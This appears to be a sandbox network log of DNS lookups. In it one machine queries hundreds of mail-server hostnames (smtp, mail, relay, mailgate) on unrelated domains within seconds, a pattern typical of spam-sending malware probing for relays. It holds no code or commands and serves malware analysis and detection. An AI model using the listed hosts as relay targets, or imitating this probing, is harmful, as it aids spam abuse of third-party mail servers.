Dec 22, 2023 21:15:10.957025051 CET	1.1.1.1	192.168.2.4	0x5885	Name error (3)	smtp.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.957798958 CET	1.1.1.1	192.168.2.4	0x17ab	Name error (3)	mail.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.960138083 CET	1.1.1.1	192.168.2.4	0xe6ea	Name error (3)	mail.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.960395098 CET	1.1.1.1	192.168.2.4	0xc0a2	Name error (3)	mail.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.960685015 CET	1.1.1.1	192.168.2.4	0x2aa0	Name error (3)	mail.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.965723038 CET	1.1.1.1	192.168.2.4	0x9520	Name error (3)	mail.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.968878984 CET	1.1.1.1	192.168.2.4	0x3cb6	Name error (3)	relay.valentinegrowers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.969188929 CET	1.1.1.1	192.168.2.4	0x77e2	Name error (3)	smtp.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.983140945 CET	1.1.1.1	192.168.2.4	0xca81	Name error (3)	smtp.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.984505892 CET	1.1.1.1	192.168.2.4	0xaa8a	Name error (3)	smtp.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.986537933 CET	1.1.1.1	192.168.2.4	0x37b	Name error (3)	smtp.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:10.994827032 CET	1.1.1.1	192.168.2.4	0x4ae5	Name error (3)	mail.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.009279966 CET	1.1.1.1	192.168.2.4	0xe1e0	Name error (3)	smtp.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.009562016 CET	1.1.1.1	192.168.2.4	0xc122	Name error (3)	mailgate.djaskdas.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.016635895 CET	1.1.1.1	192.168.2.4	0xb43f	Name error (3)	mailgate.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.019357920 CET	1.1.1.1	192.168.2.4	0x1da3	Name error (3)	smtp.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.019577980 CET	1.1.1.1	192.168.2.4	0x9a5	Name error (3)	smtp.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.020263910 CET	1.1.1.1	192.168.2.4	0xb845	Name error (3)	smtp.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.026695967 CET	1.1.1.1	192.168.2.4	0x21ab	Name error (3)	mail.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.047163010 CET	1.1.1.1	192.168.2.4	0x7fcf	Name error (3)	smtp.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.048055887 CET	1.1.1.1	192.168.2.4	0xd765	Name error (3)	relay.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.049918890 CET	1.1.1.1	192.168.2.4	0x769d	Name error (3)	mail.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.049930096 CET	1.1.1.1	192.168.2.4	0x4edb	Name error (3)	mail.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.061767101 CET	1.1.1.1	192.168.2.4	0x67cd	Name error (3)	mail.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.061827898 CET	1.1.1.1	192.168.2.4	0x67cd	Name error (3)	mail.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.104082108 CET	1.1.1.1	192.168.2.4	0x4ae5	Name error (3)	mail.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.104897976 CET	1.1.1.1	192.168.2.4	0x7fcf	Name error (3)	smtp.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.105026007 CET	1.1.1.1	192.168.2.4	0xaa8a	Name error (3)	smtp.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.105581999 CET	1.1.1.1	192.168.2.4	0x1da3	Name error (3)	smtp.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.105609894 CET	1.1.1.1	192.168.2.4	0x21ab	Name error (3)	mail.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.105825901 CET	1.1.1.1	192.168.2.4	0x37b	Name error (3)	smtp.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.115523100 CET	1.1.1.1	192.168.2.4	0x562b	Name error (3)	smtp.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.115586042 CET	1.1.1.1	192.168.2.4	0x562b	Name error (3)	smtp.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.126399994 CET	1.1.1.1	192.168.2.4	0x636e	Name error (3)	smtp.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.156407118 CET	1.1.1.1	192.168.2.4	0xf339	Name error (3)	smtp.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.157083988 CET	1.1.1.1	192.168.2.4	0x62d2	Name error (3)	smtp.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.157380104 CET	1.1.1.1	192.168.2.4	0x60ba	Name error (3)	relay.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.157490015 CET	1.1.1.1	192.168.2.4	0x100	Name error (3)	smtp.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.159780979 CET	1.1.1.1	192.168.2.4	0xd03d	Name error (3)	smtp.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.178864002 CET	1.1.1.1	192.168.2.4	0xca50	Name error (3)	caribbean360-com.p20.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.235352993 CET	1.1.1.1	192.168.2.4	0x4c06	Name error (3)	mail.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.235363960 CET	1.1.1.1	192.168.2.4	0x4c06	Name error (3)	mail.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.255625010 CET	1.1.1.1	192.168.2.4	0x598d	Name error (3)	smtp.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.277175903 CET	1.1.1.1	192.168.2.4	0x618	Name error (3)	relay.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.277187109 CET	1.1.1.1	192.168.2.4	0x618	Name error (3)	relay.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.302028894 CET	1.1.1.1	192.168.2.4	0x62d2	Name error (3)	smtp.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.302563906 CET	1.1.1.1	192.168.2.4	0xf339	Name error (3)	smtp.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.302764893 CET	1.1.1.1	192.168.2.4	0xd03d	Name error (3)	smtp.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.302881956 CET	1.1.1.1	192.168.2.4	0x598d	Name error (3)	smtp.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.302917004 CET	1.1.1.1	192.168.2.4	0x60ba	Name error (3)	relay.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.302983999 CET	1.1.1.1	192.168.2.4	0x100	Name error (3)	smtp.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.303065062 CET	1.1.1.1	192.168.2.4	0xca50	Name error (3)	caribbean360-com.p20.spamhero.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.303555965 CET	1.1.1.1	192.168.2.4	0x636e	Name error (3)	smtp.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.306838036 CET	1.1.1.1	192.168.2.4	0x6a7d	Name error (3)	smtp.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.310450077 CET	1.1.1.1	192.168.2.4	0x45e5	Name error (3)	mail.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.310483932 CET	1.1.1.1	192.168.2.4	0x45e5	Name error (3)	mail.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.335840940 CET	1.1.1.1	192.168.2.4	0xd499	Name error (3)	smtp.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.350245953 CET	1.1.1.1	192.168.2.4	0xbff8	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.350370884 CET	1.1.1.1	192.168.2.4	0xbff8	Name error (3)	mail.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.365283012 CET	1.1.1.1	192.168.2.4	0x2d4e	Name error (3)	relay.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.365353107 CET	1.1.1.1	192.168.2.4	0x2d4e	Name error (3)	relay.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.409976006 CET	1.1.1.1	192.168.2.4	0xebe2	Name error (3)	mail.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:11.410094976 CET	1.1.1.1	192.168.2.4	0xebe2	Name error (3)	mail.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.114830971 CET	1.1.1.1	192.168.2.4	0x7de1	Name error (3)	smtp.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.146816015 CET	1.1.1.1	192.168.2.4	0xa47e	Name error (3)	smtp.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.160325050 CET	1.1.1.1	192.168.2.4	0xc301	Name error (3)	relay.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.184314966 CET	1.1.1.1	192.168.2.4	0xafa2	Name error (3)	relay.sitehalogen.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.184894085 CET	1.1.1.1	192.168.2.4	0xb469	Name error (3)	smtp.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.207592964 CET	1.1.1.1	192.168.2.4	0xec8c	Name error (3)	pop.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.257409096 CET	1.1.1.1	192.168.2.4	0xadbe	Name error (3)	smtp.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.278935909 CET	1.1.1.1	192.168.2.4	0xbf02	Name error (3)	smtp.hoefakker.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.307188988 CET	1.1.1.1	192.168.2.4	0xd9f0	Name error (3)	smtp.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.308592081 CET	1.1.1.1	192.168.2.4	0x8801	Name error (3)	smtp.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.312115908 CET	1.1.1.1	192.168.2.4	0x9044	Name error (3)	smtp.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.328169107 CET	1.1.1.1	192.168.2.4	0xec8c	Name error (3)	pop.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.345918894 CET	1.1.1.1	192.168.2.4	0x1828	Name error (3)	smtp.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.360769033 CET	1.1.1.1	192.168.2.4	0x866b	Name error (3)	smtp.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.361386061 CET	1.1.1.1	192.168.2.4	0x236c	Name error (3)	smtp.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.389791965 CET	1.1.1.1	192.168.2.4	0x15f3	Name error (3)	relay.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.406569958 CET	1.1.1.1	192.168.2.4	0x641f	Name error (3)	smtp.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.408668995 CET	1.1.1.1	192.168.2.4	0x36c8	No error (0)	sites.google.com		142.250.217.206	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.426553011 CET	1.1.1.1	192.168.2.4	0x66ee	Name error (3)	smtp.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.427254915 CET	1.1.1.1	192.168.2.4	0x98fa	Name error (3)	smtp.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.439835072 CET	1.1.1.1	192.168.2.4	0x53b9	Name error (3)	mailgate.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.457889080 CET	1.1.1.1	192.168.2.4	0x1828	Name error (3)	smtp.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.461019993 CET	1.1.1.1	192.168.2.4	0x83e	Name error (3)	smtp.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.496331930 CET	1.1.1.1	192.168.2.4	0x53b9	Name error (3)	mailgate.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.521157026 CET	1.1.1.1	192.168.2.4	0x66ee	Name error (3)	smtp.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.533099890 CET	1.1.1.1	192.168.2.4	0x519d	Name error (3)	smtp.pkmanagment.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.580013990 CET	1.1.1.1	192.168.2.4	0x83e	Name error (3)	smtp.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.586982965 CET	1.1.1.1	192.168.2.4	0x2ec2	Name error (3)	mailgate.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.630398989 CET	1.1.1.1	192.168.2.4	0x284	Name error (3)	smtp.nhclex.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.633183956 CET	1.1.1.1	192.168.2.4	0x2a94	Name error (3)	smtp.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.670896053 CET	1.1.1.1	192.168.2.4	0x2a94	Name error (3)	smtp.ambquinn.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.734005928 CET	1.1.1.1	192.168.2.4	0x70b9	Name error (3)	smtp.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.734015942 CET	1.1.1.1	192.168.2.4	0x70b9	Name error (3)	smtp.mobile.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.877007008 CET	1.1.1.1	192.168.2.4	0x3381	Name error (3)	smtp.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.877094984 CET	1.1.1.1	192.168.2.4	0x3381	Name error (3)	smtp.rumbeandoelmundo.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.967343092 CET	1.1.1.1	192.168.2.4	0xf3e7	Name error (3)	mailgate.154892628.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.971373081 CET	1.1.1.1	192.168.2.4	0x6a74	Name error (3)	pop3.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.993741989 CET	1.1.1.1	192.168.2.4	0xf9a7	Name error (3)	mailgate.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.993798018 CET	1.1.1.1	192.168.2.4	0xf9a7	Name error (3)	mailgate.srlbonfon9.com.hk	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:12.998745918 CET	1.1.1.1	192.168.2.4	0x6a74	Name error (3)	pop3.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.002943039 CET	1.1.1.1	192.168.2.4	0x9c2b	Name error (3)	smtp.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.026181936 CET	1.1.1.1	192.168.2.4	0xda9a	Server failure (2)	mailgate.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.026196957 CET	1.1.1.1	192.168.2.4	0xda9a	Server failure (2)	mailgate.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.026225090 CET	1.1.1.1	192.168.2.4	0xda9a	Server failure (2)	mailgate.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.122220993 CET	1.1.1.1	192.168.2.4	0x9c2b	Name error (3)	smtp.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.160567045 CET	1.1.1.1	192.168.2.4	0xed9	Name error (3)	relay.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.160633087 CET	1.1.1.1	192.168.2.4	0xed9	Name error (3)	relay.buyhits.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.332645893 CET	1.1.1.1	192.168.2.4	0x4fef	Name error (3)	mailgate.integral-tours.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.443509102 CET	1.1.1.1	192.168.2.4	0xdfa2	Name error (3)	smtp.williamcroy.plus.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.802711964 CET	1.1.1.1	192.168.2.4	0x6ce8	Name error (3)	ssh.cicfl.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.843575001 CET	1.1.1.1	192.168.2.4	0xa3bd	Name error (3)	mailgate.acaiforcemaxweightloss.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:13.843821049 CET	1.1.1.1	192.168.2.4	0xfdf2	Name error (3)	mailgate.e-manage.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.060792923 CET	1.1.1.1	192.168.2.4	0xe3b5	Name error (3)	mailgate.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.298573017 CET	1.1.1.1	192.168.2.4	0x8f19	Name error (3)	mailgate.chemcaregroup.compg	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.329569101 CET	1.1.1.1	192.168.2.4	0x8e65	Name error (3)	mailgate.freedhal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.524996042 CET	1.1.1.1	192.168.2.4	0x4a29	Name error (3)	smtp.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.525031090 CET	1.1.1.1	192.168.2.4	0x4a29	Name error (3)	smtp.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.525058031 CET	1.1.1.1	192.168.2.4	0x4a29	Name error (3)	smtp.excursionesmadryn.com.ar	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.588403940 CET	1.1.1.1	192.168.2.4	0xb53c	Server failure (2)	mail.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.588414907 CET	1.1.1.1	192.168.2.4	0xb53c	Server failure (2)	mail.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.588423967 CET	1.1.1.1	192.168.2.4	0xb53c	Server failure (2)	mail.distraction.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.727632999 CET	1.1.1.1	192.168.2.4	0xf197	Name error (3)	mailgate.piiyuw.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.727678061 CET	1.1.1.1	192.168.2.4	0x3ad1	Name error (3)	mailgate.rio-perfume.orgua	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.908850908 CET	1.1.1.1	192.168.2.4	0x3d0e	Name error (3)	mailgate.arbsdecq.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.935538054 CET	1.1.1.1	192.168.2.4	0x151d	Name error (3)	mailgate.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.953530073 CET	1.1.1.1	192.168.2.4	0x6b2b	Name error (3)	mailgate.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.956569910 CET	1.1.1.1	192.168.2.4	0x7bf3	Name error (3)	mailgate.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.971172094 CET	1.1.1.1	192.168.2.4	0x6bd1	Name error (3)	mailgate.dm.famm.us	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.972023964 CET	1.1.1.1	192.168.2.4	0x2aa1	Name error (3)	mailgate.jesusanswwers.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.985243082 CET	1.1.1.1	192.168.2.4	0x795e	Name error (3)	mailgate.mercor.compl	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.986164093 CET	1.1.1.1	192.168.2.4	0x9a30	Name error (3)	mailgate.taylorbryant.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.987200975 CET	1.1.1.1	192.168.2.4	0xde9b	Name error (3)	mailgate.mywitce.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.989995003 CET	1.1.1.1	192.168.2.4	0xe9bf	Name error (3)	mailgate.bopclip.org	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:14.990668058 CET	1.1.1.1	192.168.2.4	0xf2c6	Name error (3)	mailgate.studnets.ocps.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.000736952 CET	1.1.1.1	192.168.2.4	0x2b39	Name error (3)	mailgate.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.012175083 CET	1.1.1.1	192.168.2.4	0xa692	Name error (3)	mailgate.aurora-resorts.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.021634102 CET	1.1.1.1	192.168.2.4	0xaf2e	Name error (3)	mailgate.hermanassociatesnewyork.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.041748047 CET	1.1.1.1	192.168.2.4	0xecfd	Name error (3)	mailgate.djmeca.com.ca	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.042264938 CET	1.1.1.1	192.168.2.4	0xa458	Name error (3)	mailgate.daystarbookscharity.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.042524099 CET	1.1.1.1	192.168.2.4	0xdfcc	Name error (3)	mailgate.dinfos.net	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.044864893 CET	1.1.1.1	192.168.2.4	0x3cf7	Name error (3)	mailgate.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.076757908 CET	1.1.1.1	192.168.2.4	0x7bf3	Name error (3)	mailgate.saskgmail.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.077047110 CET	1.1.1.1	192.168.2.4	0x151d	Name error (3)	mailgate.enhancementsmast.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.077282906 CET	1.1.1.1	192.168.2.4	0x6b2b	Name error (3)	mailgate.select-feeds.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.084145069 CET	1.1.1.1	192.168.2.4	0xa386	Name error (3)	mailgate.gpa.orgau	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.116996050 CET	1.1.1.1	192.168.2.4	0x9e87	Name error (3)	mailgate.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.117233992 CET	1.1.1.1	192.168.2.4	0x71fc	Name error (3)	mailgate.souriahost.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.117820978 CET	1.1.1.1	192.168.2.4	0x777b	Name error (3)	mailgate.263host.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.124439955 CET	1.1.1.1	192.168.2.4	0xdf80	Name error (3)	mailgate.rdhppx.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.124483109 CET	1.1.1.1	192.168.2.4	0x3cf7	Name error (3)	mailgate.mobileuser.baihe.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.124655008 CET	1.1.1.1	192.168.2.4	0x2b39	Name error (3)	mailgate.9a07f8a339ec2a3e.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.145788908 CET	1.1.1.1	192.168.2.4	0x2b96	Name error (3)	mailgate.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.149539948 CET	1.1.1.1	192.168.2.4	0x9b8	Name error (3)	mailgate.sodataol.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.154175997 CET	1.1.1.1	192.168.2.4	0x29ab	Name error (3)	mailgate.bilfinger.comqa	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.164575100 CET	1.1.1.1	192.168.2.4	0xff1b	Name error (3)	mailgate.91069b3d854a1035.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.179158926 CET	1.1.1.1	192.168.2.4	0x5f5a	Name error (3)	mailgate.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.179387093 CET	1.1.1.1	192.168.2.4	0x9d8d	Name error (3)	mailgate.dresslermd.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.195997000 CET	1.1.1.1	192.168.2.4	0x551b	Name error (3)	mailgate.vesond.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.196355104 CET	1.1.1.1	192.168.2.4	0x22ba	Name error (3)	relay.pmcsystem.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.197329044 CET	1.1.1.1	192.168.2.4	0x6ef2	Name error (3)	mailgate.hodginssmithconsulting.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.205001116 CET	1.1.1.1	192.168.2.4	0xa9c2	Name error (3)	mailgate.firsteuropaglobal.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.214750051 CET	1.1.1.1	192.168.2.4	0xd7b9	Name error (3)	mailgate.cominex.com.au	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.235538960 CET	1.1.1.1	192.168.2.4	0xcf57	Name error (3)	relay.gn.ais.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.266127110 CET	1.1.1.1	192.168.2.4	0xade6	Name error (3)	mailgate.joserafael.com.ve	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.270778894 CET	1.1.1.1	192.168.2.4	0x9e87	Name error (3)	mailgate.hyiquu.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.271538019 CET	1.1.1.1	192.168.2.4	0x2b96	Name error (3)	mailgate.nsorekek.com	none	none	A (IP address)	IN (0x0001)	false
Dec 22, 2023 21:15:15.271548986 CET	1.1.1.1	192.168.2.4	0x5f5a	Name error (3)	mailgate.earnmagabucks.com	none	none	A (IP address)	IN (0x0001)	false
